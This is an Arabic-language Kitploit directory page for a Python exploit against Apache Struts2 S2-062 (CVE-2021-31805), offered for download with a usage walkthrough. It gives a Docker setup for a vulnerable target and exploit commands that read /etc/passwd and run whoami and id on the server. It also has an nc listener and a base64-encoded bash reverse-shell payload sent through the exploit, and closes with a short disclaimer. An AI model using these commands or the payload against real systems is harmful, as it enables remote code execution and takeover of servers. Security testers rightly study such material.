Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Struts2_S2-062_CVE-2021-31805 — استغلال Python لثغرة Apache Struts2 S2-062 (CVE-2021-31805) لتنفيذ الأكواد عن بُعد، مع بيئة إعادة إنتاج مبنية على Docker وتوليد حمولة قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

استغلال Python لثغرة Apache Struts2 S2-062 (CVE-2021-31805) لتنفيذ الأكواد عن بُعد، مع بيئة إعادة إنتاج مبنية على Docker وتوليد حمولة قشرة عكسية.

عرض المستودع
115منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Struts2_S2-062_CVE-2021-31805

ثغرة التنفيذ عن بُعد لـ Apache Struts2 S2-062 (CVE-2021-31805) | قشرة عكسية (Reverse Shell)

بيئة إعادة إنتاج الثغرة

docker-compose.yml

root@kitploit:~
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

سحب الصورة وتشغيل البيئة

root@kitploit:~
docker-compose up -d

عنوان الوصول: http://1.1.1.1:8080

سكربت التحقق من الثغرة

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

القشرة العكسية (Reverse Shell)

فتح منفذ الاستماع عبر NC

root@kitploit:~
nc -lvvp 8081

NC

إنشاء سكربت القشرة العكسية المشفر بـ base64، باستخدام الموقع التالي: https://ir0ny.top/pentest/reverse-encoder-shell.html base64

الحصول على القشرة

root@kitploit:~
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

تم الحصول على القشرة بنجاح

Shell_code

إخلاء المسؤولية

لا تستخدمه لأغراض غير قانونية، استخدمه فقط لاختبارات الأمان، وإلا فإن العواقب لا علاقة لها بهذا المشروع. ملاحظة: يجب اختبار المواقع فقط بتفويض رسمي: الاختراق غير القانوني للمواقع، دموع الأحباء تنساب.

تنزيل الأداة